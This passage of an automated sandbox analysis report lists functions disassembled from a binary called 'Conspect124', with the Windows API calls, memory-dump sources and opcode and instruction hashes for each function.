                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                      Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                      • malloc.MSVCRT ref: 00417459
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                      • free.MSVCRT ref: 0041747F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$freemalloc
                                      • String ID:
                                      • API String ID: 2605342592-0
                                      • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                      • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                      Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                      • RegisterClassW.USER32(00000001), ref: 00412428
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                      • String ID:
                                      • API String ID: 2678498856-0
                                      • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                      • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                      Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,?), ref: 00409B40
                                      • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                      • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                      • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item
                                      • String ID:
                                      • API String ID: 3888421826-0
                                      • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                      • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                      • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                      Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00417B7B
                                      • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                      • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                      • GetLastError.KERNEL32 ref: 00417BB5
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ErrorLastLockUnlockmemset
                                      • String ID:
                                      • API String ID: 3727323765-0
                                      • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                      • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                      • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                      • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                      Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040F673
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                      • strlen.MSVCRT ref: 0040F6A2
                                      • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                      • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                      Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040F6E2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                      • strlen.MSVCRT ref: 0040F70D
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                      • String ID:
                                      • API String ID: 2754987064-0
                                      • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                      • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                      Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                      • String ID:
                                      • API String ID: 764393265-0
                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                      Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Time$System$File$LocalSpecific
                                      • String ID:
                                      • API String ID: 979780441-0
                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                      Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$DialogHandleModuleParam
                                      • String ID:
                                      • API String ID: 1386444988-0
                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                      Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: InvalidateMessageRectSend
                                      • String ID: d=E
                                      • API String ID: 909852535-3703654223
                                      • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                      • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                      Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT ref: 0040F79E
                                      • wcschr.MSVCRT ref: 0040F7AC
                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcschr$memcpywcslen
                                      • String ID: "
                                      • API String ID: 1983396471-123907689
                                      • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                      • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                      Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • _snwprintf.MSVCRT ref: 0040A398
                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemcpy
                                      • String ID: %2.2X
                                      • API String ID: 2789212964-323797159
                                      • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                      • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                      Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _snwprintf
                                      • String ID: %%-%d.%ds
                                      • API String ID: 3988819677-2008345750
                                      • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                      • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                      Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                      • memset.MSVCRT ref: 00401917
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: PlacementWindowmemset
                                      • String ID: WinPos
                                      • API String ID: 4036792311-2823255486
                                      • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                      • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                      Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                      • wcscat.MSVCRT ref: 0040DCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileModuleNamewcscatwcsrchr
                                      • String ID: _lng.ini
                                      • API String ID: 383090722-1948609170
                                      • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                      • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                      Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                      • API String ID: 2773794195-880857682
                                      • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                      • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                      Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                      • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: LongWindow
                                      • String ID: MZ@
                                      • API String ID: 1378638983-2978689999
                                      • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                      • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                      • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                      • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                      Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                      Download Yara Rule
                                      APIs
                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                      • memset.MSVCRT ref: 0042BAAE
                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID:
                                      • API String ID: 438689982-0
                                      • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                      • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                      Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
